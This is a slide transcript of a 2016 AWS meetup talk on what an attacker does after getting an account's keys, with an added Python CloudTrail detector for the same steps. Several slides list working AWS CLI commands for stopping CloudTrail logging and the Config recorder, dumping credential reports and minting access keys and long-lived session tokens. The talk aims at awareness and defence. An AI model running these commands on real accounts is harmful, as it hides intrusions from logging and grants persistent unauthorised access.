
Walkthrough of a compromised AWS Account - AWS Meetup Nov2016

Ashish
November 24, 2016

The talk was presented at the AWS Melbourne Meetup in Melbourne, Australia


Transcript

  1. WHO AM I
     • Ashish (@hashishrajan)
     • Security Architect + Consultant + Engineer at a startup called Versent
     • Versent – 7th in the list of fastest growing startups in Australia for 2016 (source: BRW Australia 2016 edition)
  2. AGENDA
     • AWS Primer
     • How someone can get keys to an AWS Account
     • What I do with the keys
     • What can you do next
  3. AWS PRIMER - Infrastructure as a Service (IaaS)
     • Root Account vs IAM Users vs IAM Roles
     • Key Pairs vs Access Keys
     • VPC vs EC2
     • CloudTrail vs CloudWatch
     • KMS
     • S3 Buckets
     • Route53
  4. KEYS IN THE WILD
     • Application Source Code
     • CI/CD systems
     • GitHub
     • Rogue AWS Accounts
     • Reddit
     • AWS Forum
     • Tech Forums
     • Social Engineering
  5. LEGITIMATE WAY
     • Security Review of AWS Accounts for compliance checks
     • Organization’s AWS Expert
     • New AWS Account - 12-month free tier
  6. ATTACK VECTORS
     • AWS Console + IAM User
     • AWS CLI + Access Keys
     • SSH Keys + EC2 Instances
     • Snapshots + EC2 Instances
     • AWS Metadata Endpoint
     • Misconfiguration of AWS Resources
  7. WHAT DO WE HAVE
     • aws sts get-caller-identity
     • aws sts get-session-token --duration-seconds 129600
  8. AWS CLOUDTRAIL:* Stop Footprint collection!!
     • aws cloudtrail describe-trails
     • aws cloudtrail stop-logging --name All
     • aws cloudtrail update-trail --name All --no-is-multi-region-trail --no-include-global-service-events
     • Note: S3 Bucket Name
  9. AWS IAM:* What kind of account do I have?
     • aws iam get-account-summary
     • aws iam list-users | grep ashish
     • aws iam get-credential-report | jq -r '.Content' | base64 --decode > output.csv
     • aws iam create-access-key --user-name captain.america
     • aws sts get-session-token --duration-seconds 129600
     • aws iam list-roles | jq '.Roles[] .RoleName'
  10. AWS ROUTE53:*
     • aws route53 list-hosted-zones | jq
     • aws route53 list-resource-record-sets --hosted-zone-id /hostedzone/ABCD | jq '.ResourceRecordSets[] | .Name'
     • Google search keyword: site:sitename.com.au
  11. AWS CONFIGSERVICE:*
     • aws configservice get-status
     • aws configservice describe-configuration-recorder-status
     • aws configservice stop-configuration-recorder --configuration-recorder-name <recorder-name>
  12. AWS EC2:*
     • EC2 Instances - Bastion
     • Elastic IPs - PublicIp
     • Security Groups
     • Key Pair
     • Route Tables
     • VPC Endpoints
     • VPC Peering
     • Snapshots
  13. AWS S3:*
     • Source code
     • Paid software
     • Startup Script
     • CloudTrail
     • Website Code
  14. THERE IS HOPE
     • Reactive AWS Environment
     • AWS Services – already solving the problem
     • Logging – AWS CloudTrail, AWS CloudWatch
     • Baseline Config Management - AWS Cloud Config
     • Trigger actions on events
     • IAM Roles + Policies
     • AWS CloudFormation as much as possible
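A detection rule for the "trigger actions on events" point above, as an added example that is not the speaker's code: it scans CloudTrail records for the footprint-suppression and key-minting calls shown on slides 8, 9 and 11 (StopLogging, coverage-narrowing UpdateTrail, StopConfigurationRecorder, CreateAccessKey, and a GetSessionToken with a long lifetime). The sample records, the 12-hour session threshold and the example-user ARN are constructed assumptions.

```python
# Flag CloudTrail events matching the footprint-suppression and key-minting
# steps on the slides (added example; SAMPLE_RECORDS are constructed, not
# real account data; field names follow the CloudTrail record format).
MAX_SESSION_SECONDS = 12 * 3600  # assumed threshold; the slides request 129600s

# (eventSource, eventName) pairs that should never pass silently.
SUSPICIOUS = {
    ("cloudtrail.amazonaws.com", "StopLogging"): "trail logging stopped",
    ("config.amazonaws.com", "StopConfigurationRecorder"): "Config recorder stopped",
    ("iam.amazonaws.com", "CreateAccessKey"): "new long-lived access key created",
}

def classify(record):
    """Return a reason string if the record looks like tampering, else None."""
    key = (record.get("eventSource"), record.get("eventName"))
    params = record.get("requestParameters") or {}
    if key in SUSPICIOUS:
        return SUSPICIOUS[key]
    # UpdateTrail that narrows coverage (the two --no- flags on slide 8)
    if key == ("cloudtrail.amazonaws.com", "UpdateTrail") and (
            params.get("isMultiRegionTrail") is False
            or params.get("includeGlobalServiceEvents") is False):
        return "trail coverage narrowed"
    # GetSessionToken asking for an unusually long-lived session
    if key == ("sts.amazonaws.com", "GetSessionToken") and \
            params.get("durationSeconds", 0) > MAX_SESSION_SECONDS:
        return f"session token requested for {params['durationSeconds']}s"
    return None

def detect_tampering(records):
    """Return (eventTime, actor ARN, reason) for each suspicious record."""
    return [(r.get("eventTime"), r.get("userIdentity", {}).get("arn", "?"), reason)
            for r in records if (reason := classify(r))]

ACTOR = {"arn": "arn:aws:iam::123456789012:user/example-user"}  # constructed
SAMPLE_RECORDS = [
    {"eventTime": "2016-11-20T01:00:00Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "DescribeTrails", "requestParameters": None, "userIdentity": ACTOR},
    {"eventTime": "2016-11-20T01:00:05Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "StopLogging", "requestParameters": {"name": "All"}, "userIdentity": ACTOR},
    {"eventTime": "2016-11-20T01:00:09Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "UpdateTrail", "userIdentity": ACTOR, "requestParameters":
     {"name": "All", "isMultiRegionTrail": False, "includeGlobalServiceEvents": False}},
    {"eventTime": "2016-11-20T01:01:00Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetSessionToken", "requestParameters": {"durationSeconds": 129600},
     "userIdentity": ACTOR},
    {"eventTime": "2016-11-20T01:02:00Z", "eventSource": "config.amazonaws.com",
     "eventName": "StopConfigurationRecorder", "userIdentity": ACTOR,
     "requestParameters": {"configurationRecorderName": "default"}},
]
```

Wired to a CloudWatch Events rule or run over the trail's S3 objects, the same `classify` check turns the slide's "trigger actions on events" into a concrete alert; the read-only DescribeTrails record is deliberately left unflagged.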
  15. ~FIN~ You can talk nerdy to me:
     • @hashishrajan
     • https://au.linkedin.com/in/ashishrajan